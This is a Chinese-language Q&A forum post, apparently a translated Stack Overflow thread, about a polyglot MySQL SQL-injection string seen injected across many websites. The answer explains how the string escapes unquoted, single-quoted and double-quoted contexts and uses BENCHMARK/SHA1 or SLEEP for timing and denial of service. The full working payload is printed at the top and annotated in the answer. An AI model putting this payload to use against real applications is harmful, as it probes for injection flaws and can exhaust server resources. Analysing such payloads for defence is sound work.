IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2600000,SHA1(0xDEADBEEF)),SLEEP(5))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2600000,SHA1(0xDEADBEEF)),SLEEP(5)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2600000,SHA1(0xDEADBEEF)),SLEEP(5)))OR"*/
你可以在google中找到很多注入的网站(使用此代码)。我估计有一些“超级黑客脚本”用于此。它似乎使用“sample@email.tst”作为默认电子邮件地址。有人知道那个剧本吗?
答案 0 :(得分:4)
无论输入框的值是否在旧版本的MySQL上没有引用,单引号或双引号,以及在较新版本上,无论输入框的值是否为高,并且在较新版本上,睡眠时间为5秒,保持连接处于打开状态,它的设计都很难。
在每种情况下,如果应用程序容易受到SQL注入攻击,它可能会执行拒绝服务攻击,因为长时间保持连接打开可能会导致服务器耗尽资源/可用连接。
-- if unquoted, it sees this:
IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2600000,SHA1(0xDEADBEEF)),SLEEP(5))
---and then ignores the rest, which appears commented:
/*
-- If it's single-quoted, it doesn't see the comment,
-- rather, it terminates the singlequote:
'
-- ...and then sees this:
XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2600000,SHA1(0xDEADBEEF)),SLEEP(5)))OR
--- ...and then sees the next part as a single-quoted string terinated in the client
'|
--but if it's a double-quoted, string, it sees the end double-quote:
"
-- ...and runs this:
XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2600000,SHA1(0xDEADBEEF)),SLEEP(5)))OR
---and then opens a doublequote to be closed in the client
"
-- This is the end of the comment opened in the case of the unquoted client string.
*/
在每种情况下,它都试图对SHA1函数的执行进行基准测试,这非常占用CPU资源。 BENCHMARK只是一个执行另一个表达式固定次数的函数。在这种情况下,它用于在主机上执行CPU DOS。